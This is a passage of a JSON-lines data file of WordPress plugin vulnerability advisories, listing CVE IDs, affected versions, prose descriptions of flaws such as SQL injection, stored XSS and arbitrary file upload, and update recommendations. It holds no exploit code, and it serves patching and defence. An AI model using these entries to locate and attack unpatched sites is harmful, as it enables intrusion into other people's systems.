version","refs":"[{\"url\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"name\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52935b60-3ec5-45e6-9d12-200bf107c9df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52935b60-3ec5-45e6-9d12-200bf107c9df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5207","slug":"post-smtp","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The POST SMTP \u2013 The #1 WordPress SMTP Plugin with Advanced Email Logging and Delivery Failure Notifications plugin for WordPress is vulnerable to time-based SQL Injection via the selected parameter in all versions up to, and including, 2.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator access or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103db583-9399-4a45-a316-808b55fc6a6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103db583-9399-4a45-a316-808b55fc6a6c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Postman-Email-Log\\\/PostmanEmailQueryLog.php?rev=2974258#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Postman-Email-Log\\\/PostmanEmailQueryLog.php?rev=2974258#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3094453%40post-smtp%2Ftrunk&old=3090744%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3094453%40post-smtp%2Ftrunk&old=3090744%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36709","slug":"kingcomposer","versionEndExcluding":"2.9.4","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode in versions before 2.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6447de64-b484-4f64-ad78-7df81b5a0ed7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6447de64-b484-4f64-ad78-7df81b5a0ed7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpsocket.com\\\/plugin\\\/kingcomposer\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpsocket.com\\\/plugin\\\/kingcomposer\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3516","slug":"simple-lightbox","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The Simple Lightbox WordPress plugin before 2.9.4 does not validate and escape some of its attributes before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/336a78cd-297b-4f47-a007-e33eac7f1dad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/336a78cd-297b-4f47-a007-e33eac7f1dad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11727","slug":"notificationx","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The NotificationX \u2013 Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content settings for notifications in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205560\\\/notificationx\\\/trunk\\\/includes\\\/FrontEnd\\\/Preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205560\\\/notificationx\\\/trunk\\\/includes\\\/FrontEnd\\\/Preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338edb1d-101a-4b6e-ac25-b59bd3e17f8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338edb1d-101a-4b6e-ac25-b59bd3e17f8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0859","slug":"affiliates-manager","versionImpact":"2.9.34","versionEndExcluding":"2.9.35","description":"The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.9.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliates-manager\\\/trunk\\\/classes\\\/ListAffiliatesTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliates-manager\\\/trunk\\\/classes\\\/ListAffiliatesTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028484\\\/affiliates-manager\\\/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028484\\\/affiliates-manager\\\/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13391","slug":"paid-membership","versionImpact":"2.9.29","versionEndExcluding":"2.9.30","description":"The MicroPayments \u2013 Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_content_upload_guest' shortcode in all versions up to, and including, 2.9.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224254%40paid-membership&new=3224254%40paid-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224254%40paid-membership&new=3224254%40paid-membership&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3948ef-11be-450d-ad20-e4bebc16e790?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3948ef-11be-450d-ad20-e4bebc16e790?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4307","slug":"pardakht-delkhah","versionEndExcluding":"2.9.3","description":"The ?????? ?????? ?????? WordPress plugin before 2.9.3 does not sanitise and escape some parameters, allowing unauthenticated attackers to send a request with XSS payloads, which will be triggered when a high privilege users such as admin visits a page from the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4000ba69-d73f-4c5b-a299-82898304cebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4000ba69-d73f-4c5b-a299-82898304cebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4968","slug":"wplegalpages","versionImpact":"2.9.2","versionEndExcluding":"2.9.3","description":"The WPLegalPages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wplegalpage' shortcode in versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976774\\\/wplegalpages\\\/trunk\\\/public\\\/class-wp-legal-pages-public.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976774\\\/wplegalpages\\\/trunk\\\/public\\\/class-wp-legal-pages-public.php#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68d7b5d0-c777-4ff9-bdef-a7762cfbdf1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68d7b5d0-c777-4ff9-bdef-a7762cfbdf1a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wplegalpages\\\/tags\\\/2.9.2\\\/public\\\/class-wp-legal-pages-public.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wplegalpages\\\/tags\\\/2.9.2\\\/public\\\/class-wp-legal-pages-public.php#L150\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8401","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.1 via the 'get_post_data' function. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including the content of private, password-protected, and draft posts and pages.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9540b339-3386-4ee8-8141-acb9f3d83772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9540b339-3386-4ee8-8141-acb9f3d83772?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8151","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.9.1 via the 'save_block_css' function. This makes it possible for authenticated attackers, with Author-level access and above, to create CSS files in any directory, and delete CSS files in any directory in a Windows environment.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b3e93bf-af5c-4ca3-a531-2d91df880c51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b3e93bf-af5c-4ca3-a531-2d91df880c51?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8068","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to an improper capability check on the 'ajax_trash_templates' function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary attachment files, and move arbitrary posts, pages, and templates to the Trash.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.0\\\/admin\\\/include\\\/class.theme-builder.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.0\\\/admin\\\/include\\\/class.theme-builder.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cf6dae-572f-4eaa-8e8a-bca9e74fe738?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cf6dae-572f-4eaa-8e8a-bca9e74fe738?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13378","slug":"gravityforms","versionImpact":"2.9.1.3","versionEndExcluding":"2.9.2","description":"The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style_settings\u2019 parameter in versions 2.9.0.1 up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attack is only successful in the Chrome web browser, and requires directly browsing the media file via the attachment post.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"name\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f884ea43-e1a5-4b44-8a24-f68f71b0fcfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f884ea43-e1a5-4b44-8a24-f68f71b0fcfb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13377","slug":"gravityforms","versionImpact":"2.9.1.3","versionEndExcluding":"2.9.2","description":"The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018alt\u2019 parameter in all versions up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"name\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03623f00-2c3c-4590-92fe-a5eaac15b944?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03623f00-2c3c-4590-92fe-a5eaac15b944?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0318","slug":"ultimate-member","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.9.1 through different error messages in the responses. This makes it possible for unauthenticated attackers to exfiltrate data from the wp_usermeta table.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/um-actions-form.php#L944\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/um-actions-form.php#L944\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ee149bf-ffa3-4906-8be2-9c3c40b28287?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ee149bf-ffa3-4906-8be2-9c3c40b28287?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0308","slug":"ultimate-member","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the search parameter in all versions up to, and including, 2.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/class-member-directory.php#L1877\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/class-member-directory.php#L1877\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10567","slug":"ti-woocommerce-wishlist","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The TI WooCommerce Wishlist plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wizard' function in all versions up to, and including, 2.9.1. This makes it possible for unauthenticated attackers to create new pages, modify plugin settings, and perform limited options updates.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199516\\\/ti-woocommerce-wishlist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199516\\\/ti-woocommerce-wishlist\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5f2e1a-2216-4885-9b74-a08142816f2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5f2e1a-2216-4885-9b74-a08142816f2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10537","slug":"wp-user-manager","versionImpact":"2.9.11","versionEndExcluding":"2.9.12","description":"The WP User Manager \u2013 User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the validate_user_meta_key() function in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate user meta keys.","recommendation":"Update to version 2.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e9a5b7e-db74-4c66-a659-85b2509fded4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e9a5b7e-db74-4c66-a659-85b2509fded4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10216","slug":"wp-user-manager","versionImpact":"2.9.11","versionEndExcluding":"2.9.12","description":"The WP User Manager \u2013 User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_sidebar' and 'remove_sidebar' functions in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add or remove a Carbon Fields custom sidebar if the Carbon Fields (carbon-fields) plugin is installed.","recommendation":"Update to version 2.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/class-wp-user-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/class-wp-user-manager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0631","slug":"paid-memberships-pro","versionEndExcluding":"2.9.12","description":"The Paid Memberships Pro WordPress plugin before 2.9.12 does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ef92fd-b493-4488-91f0-e6ba51362f79\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ef92fd-b493-4488-91f0-e6ba51362f79\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13689","slug":"uncode-core","versionImpact":"2.9.1.6","versionEndExcluding":"2.9.1.7","description":"The Uncode Core plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.9.1.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 2.9.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"name\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0a61e11-1137-4da0-8580-0a44300b1542?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0a61e11-1137-4da0-8580-0a44300b1542?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4102","slug":"bb-plugin","versionImpact":"2.9.1","versionEndExcluding":"2.9.1.1","description":"The Beaver Builder Plugin (Starter Version) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_enabled_icons' function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability was partially patched in version 2.9.1.","recommendation":"Update to version 2.9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb4608f-fa4f-444c-a857-c9059777a70b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb4608f-fa4f-444c-a857-c9059777a70b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5744","slug":"very-simple-google-maps","versionImpact":"2.9","versionEndExcluding":"2.9.1","description":"The Very Simple Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vsgmap' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched 